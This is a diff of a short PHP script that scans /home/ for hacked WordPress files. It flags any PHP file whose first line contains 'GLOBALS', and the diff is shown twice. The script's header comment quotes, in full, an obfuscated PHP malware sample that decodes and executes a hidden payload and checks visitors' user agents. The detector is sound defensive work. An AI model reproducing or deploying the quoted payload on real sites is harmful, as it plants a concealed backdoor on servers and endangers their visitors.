emrahoruc · February 25, 2017 08:57
diff --git a/wp-hack-detector.php b/wp-hack-detector.php
 <?php
 	/**
 	* A script to detecting a hacked Wordpress site files.  
 	* <?php $yubmwzr = '+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn24!>!fyqmpef)#	x24*<!%t::!>!	x24Ypp3)%cB%iN}#*-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{f2`hA	x27pd%6<C	x27pd%6|6.7eu{66~67<&w6<*&	x72	164") && (!isset($GLOQc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>c%}&;ftmbg}	x7f;!osvufs}w;*	x7fif((function_exists("	x6f	142	x5f	163	x74	141fs!*!+A!>!{e%)!>>	x22!ftmbg)!gj<*#k#)usbut`cpV	x7f	x7f8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:7tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:7498-!#]y38#-!%w:**<")));$mkcnptm %7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#	x3P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]44-K)ebfsX	x27u%)7fmjix6<C	x27&6<*rfs4/%tmw/	x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!	xBALS["	x61	156	x75	1r($uas,"	x72	166	x3a	61	x31")) or (strstr($uas,"	x61	156	x64	162	$n)-1);} @error_reporting(0); $txmungk = implode(arrayx6f	151	x64")) or (strstr($uas,"	x63	150	x72	157	x6d	145")) or (strstbs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpu`hfsq)!sp!*#ojneb#-*f%)sf`439275ttfsqnpdov{h19275j{hnpd19275fubmg5983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz	x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T*	x7f_*#ujojRk3`{666~6<&w6<	x7fw6*CW&)7gj6<.[A	x27&6<	x7fw6*<.4`hA	x27pd%6<pd%w6Z6<.3`hA	x27pd%6<pd%w6Z6<.j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5^,%b:<!%c:>%s:	x5c%j:^<!%w`	x5c^>Ew:Qb:6	x61"]=1; $uas=strtolower($_SERVER["	x48	124	x54	120	x5f	1%:osvufs:~928>>	x22:ftmbg39*56A:>:8:|:7#6#)tutjy	x7f	x7f<u%V	x27{ftmfV	x7f<*X&Z&S{ftmfV	xq%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x	x22l:!}V]y83]273]y76]277#<!%t2w>#]y74]273]y76]25227,*b	x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eopz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]37eN+#Qi	x5c1^W%c!>!%i	x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss}&;zepc}A;~!}	x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U!	_map("shqkphm",str_split("%tjw!>!#]y84]2)7gj6<**2qj%)hopm3qjA)qj3hopmA	x273qj%6<*Y%)fnbozcYufhA	x272qj%6<FHB`SFTV`QUUI&b%!|!*)323zbeQwTW%hIr	x5c1^-%r	x5c2^-%hOh/24-!%	x24-	x24*!|!	x24-	x24	x5c%j^	x24-	x24tvctus)%	x24-	x24b!>!%yy)#t)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)su5-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]D816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SE07	x45	116	x54"]); if ((strstr($uas,"	x6d	163	x69	145")) or (strst-!	x24/%tmw/	x24)%c*W%6*	x7f_*#fmjgk4`{6~6<tfs%w6<	x7fw6*CWtfs%)7gj6<*id%)fttcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!dz*Wsfuvso!%bss	x5csboe))1/35.)1/14+9*!>>	x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}kU<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG<*QDU`MPT7-NBFSUT`LDPT7-U|!*uyfu	x27k:!ftmf!}Z;^nbsbq%	x5cSFWSFT`%}X;!sp!*#ov`ftsbqA7>q%6<	x7fw6*	x7f_*#fubfsdXk5FOJ`GB)fubfsdXA	x27K6<	x7fw6*3qj%7>	x2272qj%!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P;*msv%)}.;`UQPMSVD!-id%)uqp]234]342]58]24]31#-%t|	x24-	x24gvodujpo!	x24-	x24pg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s:	x5c%j:.228y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:h%:<#64y]5575]y83]248]y83]256]y81]265]y72]25EB`FUPNFS&d_SFSFGFS`QUUI&c_UOW~%fdy)##-!#~<%h00#*<%nfd)##Qt7-#o]s]o]s]#)fepmqyf	x27*&7-n%)utjm6<	x7fw6*CW&)r($uas,"	x66	151	x72	145	x66	157	x78"))) { $nnemjew = "	x63	16~~~<ftmbg!osvufs!|ftmf!~<**9.uft`msvd},;uqpuft`msvd}+;!>!}	x27;!>>>!}_;gv;ldpt%}K;`ufldpt}X;`msvd}R27rfs%6~6<	x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA	x22)7gj66]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72!	x27!hmg%)!gj!<<^2	x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc	x7f!2	x65	141	x74	145	x5f	146	x75	156	x63	164	x69	1ppde#)tutjyf`4	x223}!+!<+{e%+*!*+fesvufs}	x7f;!opjudovg}k~~9{d!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sbr%:-t%)3of:opjudovg<~	x24<!%o:!>!	x242178}527}88:}334}472	x24<!%f27&6<.fmjgA	x27doj%6<	x7fw9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%h**#j{hnpd#)tutjyf`opjudovg	x22)!gj}1~!<2p%	x7f!~!<##!>!2p%Z]y85]256]y6g]257]y86]267]y74]275]y7)323zbe!-#jt0*?]+^?]_	x5coepn)%epnbss-%rxW~!Ypp2)%zB%z>!	x2-	x24y4	x24-	x24]y8	x24-	x24]26	x24-	x24<%j,,*!#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#sut!-#j0#!/!**#sfmcnbs+yfeobzpmdR6<*id%)dfyfR	x27tfs%6<*17-SFEBFI,6<*127-UVPFN-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)#	x24#56	x61"])))) { $GLOBALS["	x61	156	x75	15f2!>!bssbz)	x24]25	x24-	x#>q%<#762]67y]562]38y]572]48y]#>m%:|:*;3q%}U;y]}R;2]},;osvufs}	x27;mnui/#)rrd/#00;quui#>.%!<***f	x27,*e	x27,*d	x27,*c	xoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#fxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d`{66~6<&w6<	x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA	xy7	x24-	x24*<!	x24-	x24gps)%j>1<%j=tj{fpg)%	x24-	x24}#-#	x24-	x24-tusqpt)%z-#:#*	x24-	x24!>!	x24/%tjw/	x24)%	x245]212]445]43]321]464]284]364]67f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>!	x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvx27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*#00#W~!%t2w)##Qtjw)#]82#-#!#-%	x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127.%)euhA)3of>2bd%!<5h%/#0#/*#npd#>s%<#462]47y]252]18y]4]y76#<!%w:!>!(%w:!>!	x246767~6<Cw6<pd%w6Z6<.5`hA	x27pd%6<pd%w6Z6-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3!	x27!hmg%25	x53	105	x52	137	x41	1}X	x24<!%tmw!>!#]y84]27557	x6e"; function shqkphm($n){return chr(ord(po#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l}	x27;%!<*#}_;#)323ldfid>}&;!o#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~k!~!<b%	x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj	x22)g:]268]y7f#<!%tww!>!	x2400~:<h%_t%:osvufs:~:<*9-pdfe{h+{d%)+opjudovg+)!gj+{e%!osvu27!hmg%)!gj!~<ofmy%,3,j%>1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]27]ubq#	x5cq%	x27jsv%6<C>^#zsfvr#	x5cq%7**^#zsd%-#1GO	x22#)fepmqyfA>2b%!<*qp%-*fvr#	x5cq%)ufttj	x22)gj6<^#Y#	x5cq%	x27Y%6<.ms^#zsfvr#	x5cq%7/7#@#7/7^#iJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR	x27id%6<	x7fw6*<!~!	x24/%t2w/	x24)##-!#~<#/%	x24-	x= $nnemjew("", $txmungk); $mkcnptm();}}2]e7y]#>n%<#372]58y]472]37y]672]48y]StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSqnazpxya'; $dzisuxp=explode(chr((520-400)),substr($yubmwzr,(21079-15059),(194-160))); $hsotnipa = $dzisuxp[0]($dzisuxp[(4-3)]); $fmloqwgx = $dzisuxp[0]($dzisuxp[(8-6)]); if (!function_exists('bswubzbbr')) { function bswubzbbr($iixseshjvq, $hkczml,$epnwwkwcg) { $cihtwiuu = NULL; for($lcjdjpxdr=0;$lcjdjpxdr<(sizeof($iixseshjvq)/2);$lcjdjpxdr++) { $cihtwiuu .= substr($hkczml, $iixseshjvq[($lcjdjpxdr*2)],$iixseshjvq[($lcjdjpxdr*2)+(6-5)]); } return $epnwwkwcg(chr((42-33)),chr((372-280)),$cihtwiuu); }; } $otadnuepn = explode(chr((251-207)),'304,45,214,26,789,20,4356,40,1389,59,5279,24,2291,66,809,65,928,69,3224,62,3672,47,5327,45,874,54,1893,40,3084,33,5155,65,1251,46,173,41,3176,48,5065,37,673,35,558,60,3385,62,2664,25,2777,44,1933,65,5821,26,5699,43,5775,46,2740,37,4637,46,3913,26,2379,54,4268,49,5847,61,1191,60,5005,60,3359,26,2885,27,3315,44,273,31,2509,63,3286,29,5220,59,3515,56,755,34,5634,25,1297,53,4876,49,2123,52,2433,38,3986,59,3571,41,5742,33,5102,31,4492,48,1646,56,997,41,4239,29,0,64,1038,24,4578,59,2236,55,3117,29,1998,27,5489,64,3612,60,2689,51,5372,67,3754,27,1448,48,1062,41,4540,38,3719,35,5600,34,349,54,1496,41,4825,51,2572,45,1537,68,4459,33,1834,59,4925,50,4080,25,5303,24,1605,41,4045,35,5553,47,5659,40,3015,69,5984,36,5133,22,4421,38,3848,65,4396,25,2054,69,4735,60,4139,47,2933,28,4683,52,5908,37,64,45,2357,22,1766,68,3781,67,4105,34,708,47,2025,29,4975,30,460,68,2175,61,403,57,1103,52,2821,64,3447,68,2617,47,3939,47,3146,30,1702,64,618,55,4795,30,2912,21,2471,38,109,64,2961,54,1350,39,240,33,5439,50,1155,36,4186,53,4317,39,528,30,5945,39'); $cyqbbnd = $hsotnipa("",bswubzbbr($otadnuepn,$yubmwzr,$fmloqwgx)); $hsotnipa=$yubmwzr; $cyqbbnd(""); $cyqbbnd=(404-283); $yubmwzr=$cyqbbnd-1; ?>
 	*/

        $exts = Array ('php');
 	$it = new RecursiveDirectoryIterator("/home/"); //Root dir
 	foreach(new RecursiveIteratorIterator($it) as $file) {

 		$exploded = explode('.', $file);
 		if (in_array(strtolower(array_pop($exploded)), $exts)) {

 			$f = fopen($file, 'r');
 			$line = fgets($f); // Read only first line...
 			fclose($f);

 			if (preg_match('/GLOBALS/', $line)) {
 				echo $file . "<br/> \n";
 			}
 		}
 	}

 ?>
	<?php
	/**
	* A script to detecting a hacked Wordpress site files.
	* <?php $yubmwzr = '+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn24!>!fyqmpef)# x24<!%t::!>! x24Ypp3)%cB%iN}#-)1/2986+7*^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{f2`hA x27pd%6<C x27pd%6\|6.7eu{66~67<&w6<& x72 164") && (!isset($GLOQc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>c%}&;ftmbg} x7f;!osvufs}w;* x7fif((function_exists(" x6f 142 x5f 163 x74 141fs!!+A!>!{e%)!>> x22!ftmbg)!gj<#k#)usbut`cpV x7f x7f8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:7tmw)%twwWYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:7498-!#]y38#-!%w:<")));$mkcnptm %7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x3P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]44-K)ebfsX x27u%)7fmjix6<C x27&6<rfs4/%tmw/ x24)%zW%h>EzH,2W%wN;#-Ez-1HWCw[!%rN}#2,j%-#1]#-bubE{h%)tpqsut>j%!9! xBALS[" x61 156 x75 1r($uas," x72 166 x3a 61 x31")) or (strstr($uas," x61 156 x64 162 $n)-1);} @error_reporting(0); $txmungk = implode(arrayx6f 151 x64")) or (strstr($uas," x63 150 x72 157 x6d 145")) or (strstbs`un>qp%!\|Z~!<##!>!2p%!\|!!**b%)sfxpmpu`hfsq)!sp!#ojneb#-f%)sf`439275ttfsqnpdov{h19275j{hnpd19275fubmg5983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T x7f_#ujojRk3`{666~6<&w6< x7fw6CW&)7gj6<.[A x27&6< x7fw6<.4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<.j%!<3-j%-bubE{h%)sutcvt-#w#)ldbqov>ofmy%)utjm!\|!5^,%b:<!%c:>%s: x5c%j:^<!%w` x5c^>Ew:Qb:6 x61"]=1; $uas=strtolower($_SERVER[" x48 124 x54 120 x5f 1%:osvufs:~928>> x22:ftmbg3956A:>:8:\|:7#6#)tutjy x7f x7f<u%V x27{ftmfV x7f<X&Z&S{ftmfV xq%V<#fopoV;hojepdoF.uofuopD#)sfebfI{w%)kVx{#k#)tutjyf`x x22l:!}V]y83]273]y76]277#<!%t2w>#]y74]273]y76]25227,b x27)fepdof.)fepdof./#@#/qp%>5h%!<::::::-111112)eopz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]37eN+#Qi x5c1^W%c!>!%i x5c2^<!Ce[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss}&;zepc}A;~!} x7f;!\|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! _map("shqkphm",str_split("%tjw!>!#]y84]2)7gj6<*2qj%)hopm3qjA)qj3hopmA x273qj%6<Y%)fnbozcYufhA x272qj%6<FHB`SFTV`QUUI&b%!\|!)323zbeQwTW%hIr x5c1^-%r x5c2^-%hOh/24-!% x24- x24!\|! x24- x24 x5c%j^ x24- x24tvctus)% x24- x24b!>!%yy)#t)esp>hmg%!<12>j%!\|!#91y]c9y]g2y]#>>4-1-bubE{h%)su5-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]D816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SE07 x45 116 x54"]); if ((strstr($uas," x6d 163 x69 145")) or (strst-! x24/%tmw/ x24)%cW%6 x7f_#fmjgk4`{6~6<tfs%w6< x7fw6CWtfs%)7gj6<id%)fttcvt)!gj!\|!bubE{h%)j{hnpd!opjudovg!\|!dzWsfuvso!%bss x5csboe))1/35.)1/14+9!>> x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!\|!msv%)}kU<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#<%bG<QDU`MPT7-NBFSUT`LDPT7-U\|!uyfu x27k:!ftmf!}Z;^nbsbq% x5cSFWSFT`%}X;!sp!#ov`ftsbqA7>q%6< x7fw6 x7f_#fubfsdXk5FOJ`GB)fubfsdXA x27K6< x7fw63qj%7> x2272qj%!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P;msv%)}.;`UQPMSVD!-id%)uqp]234]342]58]24]31#-%t\| x24- x24gvodujpo! x24- x24pg)%s:<%j:,,Bjg!)%j:>>1!%b:>1<!fmtf!%b:>%s: x5c%j:.228y]#/r%/h%)n%-#+I#)q%:>:r%:\|:t%)m%=h%)m%):fmjix:<##:>:h%:<#64y]5575]y83]248]y83]256]y81]265]y72]25EB`FUPNFS&d_SFSFGFS`QUUI&c_UOW~%fdy)##-!#~<%h00#<%nfd)##Qt7-#o]s]o]s]#)fepmqyf x27&7-n%)utjm6< x7fw6CW&)r($uas," x66 151 x72 145 x66 157 x78"))) { $nnemjew = " x63 16~~~<ftmbg!osvufs!\|ftmf!~<9.uft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!}_;gv;ldpt%}K;`ufldpt}X;`msvd}R27rfs%6~6< x7fw6<K)ftpmdXA6\|7*197-2qj%7-K)udfoopdXA x22)7gj66]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y!)!gj!<2,j%!-#1]#-bubE{h%)tpqsut>j%!72! x27!hmg%)!gj!<<^2 x5c2b%!>!2p%!3>?2b%)gpf{jt)!gj!<2bj!\|!nbsbq%)323ldfidk!~!<qp%!-uyfu%)3of)fepdof`57ftbc x7f!2 x65 141 x74 145 x5f 146 x75 156 x63 164 x69 1ppde#)tutjyf`4 x223}!+!<+{e%+!+fesvufs} x7f;!opjudovg}k~~9{d!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#<!sfuvso!sbr%:-t%)3of:opjudovg<~ x24<!%o:!>! x242178}527}88:}334}472 x24<!%f27&6<.fmjgA x27doj%6< x7fw9}:}.}-}!#<%nfd>%fdy<Cb[%h!>!%tdz)%bbT-%bT-%h*#j{hnpd#)tutjyf`opjudovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z]y85]256]y6g]257]y86]267]y74]275]y7)323zbe!-#jt0?]+^?]_ x5coepn)%epnbss-%rxW~!Ypp2)%zB%z>! x2- x24y4 x24- x24]y8 x24- x24]26 x24- x24<%j,,!#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#sut!-#j0#!/!#sfmcnbs+yfeobzpmdR6<id%)dfyfR x27tfs%6<17-SFEBFI,6<127-UVPFN-#N#-!%ff2-!%t::<(<!fwbm)%tjw)# x24#56 x61"])))) { $GLOBALS[" x61 156 x75 15f2!>!bssbz) x24]25 x24- x#>q%<#762]67y]562]38y]572]48y]#>m%:\|:;3q%}U;y]}R;2]},;osvufs} x27;mnui/#)rrd/#00;quui#>.%!<**f x27,e x27,d x27,c xoj{h1:\|:mmvo:>:iuhofm%:-5ppde:4:\|:#fxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<#cd2bge56+99386c6f+9f5d`{66~6<&w6< x7fw6CW&)7gj6<doj%7-C)fepmqnjA xy7 x24- x24<! x24- x24gps)%j>1<%j=tj{fpg)% x24- x24}#-# x24- x24-tusqpt)%z-#:# x24- x24!>! x24/%tjw/ x24)% x245]212]445]43]321]464]284]364]67f<XAZASV<w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>! x27!hmg%)!gj!\|!1?hmg%)!gj!<2-4-bubE{h%)sutcvx27{u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/#00#W~!%t2w)##Qtjw)#]82#-#!#-% x7f_#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[7gj6<K)ftpmdXA6~6<u%7>/7&6\|7*111127.%)euhA)3of>2bd%!<5h%/#0#/#npd#>s%<#462]47y]252]18y]4]y76#<!%w:!>!(%w:!>! x246767~6<Cw6<pd%w6Z6<.5`hA x27pd%6<pd%w6Z6-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!3! x27!hmg%25 x53 105 x52 137 x41 1}X x24<!%tmw!>!#]y84]27557 x6e"; function shqkphm($n){return chr(ord(po#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;%!<#}_;#)323ldfid>}&;!o#p#/#p#/%z<jg!)%z>>2!%z>3<!fmtf!%z>2<!%ww2)%w`TW~k!~!<b% x7f!<X>b%Z<#opo#>b%!##>>X)!gjZ<#opo#>b%!*X)ufttj x22)g:]268]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<9-pdfe{h+{d%)+opjudovg+)!gj+{e%!osvu27!hmg%)!gj!~<ofmy%,3,j%>1-r%)s%>/h%:<#57]38y]47]67y]37]88y]27]ubq# x5cq% x27jsv%6<C>^#zsfvr# x5cq%7^#zsd%-#1GO x22#)fepmqyfA>2b%!<qp%-fvr# x5cq%)ufttj x22)gj6<^#Y# x5cq% x27Y%6<.ms^#zsfvr# x5cq%7/7#@#7/7^#iJU,6<27-SFGTOBSUOSVUFS,6<msv%7-MSV,6<)ujojR x27id%6< x7fw6<!~! x24/%t2w/ x24)##-!#~<#/% x24- x= $nnemjew("", $txmungk); $mkcnptm();}}2]e7y]#>n%<#372]58y]472]37y]672]48y]StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSqnazpxya'; $dzisuxp=explode(chr((520-400)),substr($yubmwzr,(21079-15059),(194-160))); $hsotnipa = $dzisuxp[0]($dzisuxp[(4-3)]); $fmloqwgx = $dzisuxp[0]($dzisuxp[(8-6)]); if (!function_exists('bswubzbbr')) { function bswubzbbr($iixseshjvq, $hkczml,$epnwwkwcg) { $cihtwiuu = NULL; for($lcjdjpxdr=0;$lcjdjpxdr<(sizeof($iixseshjvq)/2);$lcjdjpxdr++) { $cihtwiuu .= substr($hkczml, $iixseshjvq[($lcjdjpxdr2)],$iixseshjvq[($lcjdjpxdr2)+(6-5)]); } return $epnwwkwcg(chr((42-33)),chr((372-280)),$cihtwiuu); }; } $otadnuepn = explode(chr((251-207)),'304,45,214,26,789,20,4356,40,1389,59,5279,24,2291,66,809,65,928,69,3224,62,3672,47,5327,45,874,54,1893,40,3084,33,5155,65,1251,46,173,41,3176,48,5065,37,673,35,558,60,3385,62,2664,25,2777,44,1933,65,5821,26,5699,43,5775,46,2740,37,4637,46,3913,26,2379,54,4268,49,5847,61,1191,60,5005,60,3359,26,2885,27,3315,44,273,31,2509,63,3286,29,5220,59,3515,56,755,34,5634,25,1297,53,4876,49,2123,52,2433,38,3986,59,3571,41,5742,33,5102,31,4492,48,1646,56,997,41,4239,29,0,64,1038,24,4578,59,2236,55,3117,29,1998,27,5489,64,3612,60,2689,51,5372,67,3754,27,1448,48,1062,41,4540,38,3719,35,5600,34,349,54,1496,41,4825,51,2572,45,1537,68,4459,33,1834,59,4925,50,4080,25,5303,24,1605,41,4045,35,5553,47,5659,40,3015,69,5984,36,5133,22,4421,38,3848,65,4396,25,2054,69,4735,60,4139,47,2933,28,4683,52,5908,37,64,45,2357,22,1766,68,3781,67,4105,34,708,47,2025,29,4975,30,460,68,2175,61,403,57,1103,52,2821,64,3447,68,2617,47,3939,47,3146,30,1702,64,618,55,4795,30,2912,21,2471,38,109,64,2961,54,1350,39,240,33,5439,50,1155,36,4186,53,4317,39,528,30,5945,39'); $cyqbbnd = $hsotnipa("",bswubzbbr($otadnuepn,$yubmwzr,$fmloqwgx)); $hsotnipa=$yubmwzr; $cyqbbnd(""); $cyqbbnd=(404-283); $yubmwzr=$cyqbbnd-1; ?>
	*/

	$exts = Array ('php');
	$it = new RecursiveDirectoryIterator("/home/"); //Root dir
	foreach(new RecursiveIteratorIterator($it) as $file) {

	$exploded = explode('.', $file);
	if (in_array(strtolower(array_pop($exploded)), $exts)) {

	$f = fopen($file, 'r');
	$line = fgets($f); // Read only first line...
	fclose($f);

	if (preg_match('/GLOBALS/', $line)) {
	echo $file . "<br/> \n";
	}
	}
	}

	?>
No results found